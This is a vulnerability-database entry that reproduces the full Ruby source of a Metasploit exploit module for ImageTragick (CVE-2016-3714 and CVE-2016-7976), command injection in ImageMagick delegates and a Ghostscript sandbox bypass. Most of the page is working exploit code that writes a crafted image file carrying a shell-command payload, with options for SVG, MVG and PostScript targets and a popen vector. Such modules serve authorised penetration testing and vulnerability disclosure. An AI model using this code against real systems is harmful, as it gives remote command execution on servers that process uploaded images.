ImageMagick Delegate Arbitrary Command Execution

2016-05-05T19:18:42
ID MSF:EXPLOIT/UNIX/FILEFORMAT/IMAGEMAGICK_DELEGATE
Type metasploit
Reporter Rapid7
Modified 2019-04-24T16:34:42

Description

This module exploits a shell command injection in the way "delegates" (commands for converting files) are processed in ImageMagick versions <= 7.0.1-0 and <= 6.9.3-9 (legacy). Since ImageMagick uses file magic to detect file format, you can create a .png (for example) which is actually a crafted SVG (for example) that triggers the command injection. The PostScript (PS) target leverages a Ghostscript -dSAFER bypass (discovered by taviso) to achieve RCE in the Ghostscript delegate. Ghostscript versions 9.18 and later are affected. This target is provided as is and will not be updated to track additional vulns. If USE_POPEN is set to true, a |-prefixed command will be used for the exploit. No delegates are involved in this exploitation.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule &lt; Msf::Exploit
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'             =&gt; 'ImageMagick Delegate Arbitrary Command Execution',
      'Description'      =&gt; %q{
        This module exploits a shell command injection in the way "delegates"
        (commands for converting files) are processed in ImageMagick versions
        &lt;= 7.0.1-0 and &lt;= 6.9.3-9 (legacy).

        Since ImageMagick uses file magic to detect file format, you can create
        a .png (for example) which is actually a crafted SVG (for example) that
        triggers the command injection.

        The PostScript (PS) target leverages a Ghostscript -dSAFER bypass
        (discovered by taviso) to achieve RCE in the Ghostscript delegate.
        Ghostscript versions 9.18 and later are affected. This target is
        provided as is and will not be updated to track additional vulns.

        If USE_POPEN is set to true, a |-prefixed command will be used for the
        exploit. No delegates are involved in this exploitation.
      },
      'Author'           =&gt; [
        'stewie',            # Vulnerability discovery
        'Nikolay Ermishkin', # Vulnerability discovery
        'Tavis Ormandy',     # Vulnerability discovery
        'wvu',               # Metasploit module
        'hdm'                # Metasploit module
      ],
      'References'       =&gt; [
        %w{CVE 2016-3714},
        %w{CVE 2016-7976},
        %w{URL https://imagetragick.com/},
        %w{URL https://seclists.org/oss-sec/2016/q2/205},
        %w{URL https://seclists.org/oss-sec/2016/q3/682},
        %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
        %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456},
        %w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}
      ],
      'DisclosureDate'   =&gt; '2016-05-03',
      'License'          =&gt; MSF_LICENSE,
      'Platform'         =&gt; 'unix',
      'Arch'             =&gt; ARCH_CMD,
      'Privileged'       =&gt; false,
      'Payload'          =&gt; {
        'BadChars'       =&gt; "\x22\x27\x5c" # ", ', and \
      },
      'Targets'          =&gt; [
        ['SVG file', template: 'msf.svg'], # convert msf.png msf.svg
        ['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg
        ['PS file',  template: 'msf.ps']   # PoC from taviso
      ],
      'DefaultTarget'    =&gt; 0,
      'Notes'            =&gt; {
        'AKA'            =&gt; ['ImageTragick'],
        'RelatedModules' =&gt; [
          'exploit/unix/fileformat/ghostscript_type_confusion',
          'exploit/multi/fileformat/ghostscript_failed_restore'
        ]
      }
    ))

    register_options([
      OptString.new('FILENAME', [true, 'Output file', 'msf.png']),
      OptBool.new('USE_POPEN',  [false, 'Use popen() vector', true])
    ])
  end

  def exploit
    if target.name == 'SVG file'
      p = Rex::Text.html_encode(payload.encoded)
    else
      p = payload.encoded
    end

    file_create(template.sub('echo vulnerable &gt; /dev/tty', p))
  end

  def template
    if datastore['USE_POPEN']
      t = 'popen'
    else
      t = 'delegate'
    end

    begin
      File.read(File.join(
        Msf::Config.data_directory, 'exploits', 'imagemagick', t,
        target[:template]
      ))
    rescue Errno::ENOENT
      fail_with(Failure::NoTarget, "Target has no #{t} support")
    end
  end
end